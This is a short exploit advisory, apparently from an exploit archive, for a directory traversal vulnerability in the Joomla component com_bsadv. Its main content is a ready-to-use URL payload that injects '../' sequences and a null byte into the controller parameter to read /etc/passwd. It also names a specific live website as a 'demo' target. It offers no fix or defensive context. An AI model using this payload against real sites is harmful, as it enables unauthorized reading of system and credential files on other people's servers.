id: 14384
date: 10/08/2010
title: Joomla Component com_bsadv Directory Traversal Vulnerability
author: Fl0riX
cves: 

============================================================
Joomla Component com_bsadv Directory Traversal Vulnerability
============================================================

###############################################
#[~] Author : Fl0riX | Bug Researchers
#[!] Greetz: Sakkure And All My Friends
#[!] Script_Name: Joomla com_bsadv
#[!] Demo :http://www.simons5.com/portal/
#[!] Example;
/index.php?option=com_bsadv&controller=../../../../../../../../etc/passwd%00
############################################### 	



#  0day.today [2023-03-26]  #